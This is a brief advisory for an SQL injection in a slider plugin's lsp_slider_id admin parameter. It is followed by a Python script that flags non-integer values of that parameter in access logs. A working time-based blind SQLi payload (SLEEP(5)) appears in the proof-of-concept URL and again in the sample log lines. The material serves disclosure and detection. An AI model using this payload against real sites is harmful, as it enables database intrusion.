The plugin does not sanitise and escape the lsp_slider_id parameter before using it in a SQL statement via the Manage Slider Images admin page, leading to an SQL injection.
https://example.com/wp-admin/admin.php?page=manage_images&lsp_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)
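
One way to spot requests like the one above in web server access logs, as an added example that is not part of the original advisory or the plugin's code. It assumes combined-format access logs and that a legitimate lsp_slider_id is always a plain integer; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php'
    '?page=manage_images&lsp_slider_id=3 HTTP/1.1" 200 5120',
    '203.0.113.11 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php'
    '?page=manage_images&lsp_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)'
    ' HTTP/1.1" 200 5120',
    '203.0.113.12 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php'
    '?lsp_slider_id=abc&page=manage_images HTTP/1.1" 200 5120',
    '203.0.113.13 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin.php'
    '?page=other_page&lsp_slider_id=abc HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")  # assumption: valid slider ids are plain integers


def suspicious_slider_requests(lines):
    """Return (client_ip, decoded_value) for each manage_images request
    whose lsp_slider_id is not a plain integer after URL decoding."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        params = parse_qs(url.query)  # decodes '+' and %xx escapes
        if "manage_images" not in params.get("page", []):
            continue
        for value in params.get("lsp_slider_id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_slider_requests(SAMPLE_LOG):
        print(f"{ip}: lsp_slider_id={value!r}")
```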